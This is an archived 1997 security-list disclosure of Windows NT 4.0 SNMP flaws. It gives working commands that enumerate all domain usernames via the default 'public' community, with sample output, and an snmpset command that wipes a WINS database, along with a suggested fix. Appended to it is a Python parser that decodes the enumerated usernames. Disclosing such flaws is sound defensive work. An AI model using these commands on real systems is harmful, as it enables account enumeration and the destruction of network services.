SNMP Insecurity

Aleph One (aleph1@DFW.NET)
Wed, 08 Oct 1997 19:08:37 -0500

---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity

All:

I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging. The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior";
the second I just found, and it puts any large NT shop at a serious
denial of service (DoS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.

Here is the simplest NT example I could find to use this:

C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

<hostname> should be a domain controller or server

Sample output at end of message.

2. The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security. If
you understand large scale WINS architecture, you can understand the
implications of this. Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N = number of WINS servers). This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:

cmdDeleteWins OBJECT-TYPE
    SYNTAX IpAddress
    ACCESS read-write
    STATUS mandatory
    DESCRIPTION
        "This variable when set will cause all information
        pertaining to a WINS (data records, context
        information to be deleted from the local WINS.
        Use this only when owner-address mapping table is
        getting to near capacity. NOTE: deletion of all
        information pertaining to the managed WINS is not
        permitted"
    ::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix. The command

rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

successfully deleted my entire WINS database.

3. It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.

4. The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.

Regards,

Chris

--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com

-----

C:\NTRESKIT>snmputil walk 192.178.16.2 public .1.3.6.1.4.1.77.1.2.25

Output:

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116 Value = OCTET STRING - Guest

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49 Value = OCTET STRING - test1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.50 Value = OCTET STRING - test2

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.51 Value = OCTET STRING - test3

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.52 Value = OCTET STRING - test4

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.53 Value = OCTET STRING - test5

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.54 Value = OCTET STRING - test6

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.55 Value = OCTET STRING - test7

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.56 Value = OCTET STRING - test8

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.57 Value = OCTET STRING - test9

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48 Value = OCTET STRING - test10

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114 Value = OCTET STRING - testuser

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114 Value = OCTET STRING - Administrator

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49 Value = OCTET STRING - IUSR_NT4SRVDEV1

Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.118.101.67.109.100.69.120.101.99 Value = OCTET STRING - SQLExecutiveCmdExec

End of MIB subtree.
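The walk output above carries each username twice: once as the printed Value, and once encoded in the OID instance suffix, where the svUserTable is indexed by an OCTET STRING (a length sub-identifier followed by one sub-identifier per byte, so ".5.71.117.101.115.116" is "Guest"). The following is an added example, not code from the original post or from either tool mentioned in it: a small Python parser that takes snmputil-style walk lines, decodes the index, and cross-checks it against the printed value. The sample lines are constructed from the output shown above; note that in that output the IUSR_ entry's index does not decode to the same string as its printed value, and the parser flags that rather than trusting either side.

```python
"""Decode LanManager MIB svUserName table indexes from an snmputil walk.

Added example (not part of the original post). Handles lines of the form
  Variable = <oid>.svUserName.<len>.<b1>.<b2>... Value = OCTET STRING - <text>
An OCTET STRING table index is encoded (RFC 1212 style) as a length
sub-identifier followed by one sub-identifier per byte of the string.
"""
import re

# Constructed sample modelled on the walk output in the post (four rows kept).
SAMPLE_WALK = """\
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116 Value = OCTET STRING - Guest
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48 Value = OCTET STRING - test10
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114 Value = OCTET STRING - Administrator
Variable = .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49 Value = OCTET STRING - IUSR_NT4SRVDEV1
End of MIB subtree.
"""

LINE_RE = re.compile(r"^Variable = (?P<oid>\S+) Value = OCTET STRING - (?P<value>.*)$")


def decode_string_index(subids):
    """Decode a variable-length OCTET STRING index.

    Returns (text, leftover_subids) so the caller can notice trailing
    sub-identifiers; raises ValueError on a short or malformed index.
    """
    if not subids:
        raise ValueError("empty index")
    length = subids[0]
    body = subids[1:1 + length]
    if len(body) != length:
        raise ValueError(f"index declares {length} bytes, only {len(body)} present")
    if any(not 0 <= b <= 255 for b in body):
        raise ValueError("sub-identifier outside byte range")
    return bytes(body).decode("latin-1"), subids[1 + length:]


def parse_walk(text):
    """Return a list of (decoded_index, printed_value, consistent) per row."""
    rows = []
    marker = ".svUserName."
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or marker not in m.group("oid"):
            continue  # "End of MIB subtree." and unrelated variables
        suffix = m.group("oid").split(marker, 1)[1]
        subids = [int(s) for s in suffix.split(".")]
        name, leftover = decode_string_index(subids)
        # Both encodings should agree; report when they do not.
        consistent = (name == m.group("value")) and not leftover
        rows.append((name, m.group("value"), consistent))
    return rows


def usernames(text):
    """Sorted account names as carried in the table index."""
    return sorted(name for name, _, _ in parse_walk(text))


if __name__ == "__main__":
    for name, value, ok in parse_walk(SAMPLE_WALK):
        flag = "" if ok else "   <-- index and printed value disagree"
        print(f"{name:20s} {value}{flag}")
```

The same decoder applies to any LanManager MIB-2 table that uses a string index (sessions, shares, and so on), which is why the index is decoded independently instead of simply trusting the printed Value.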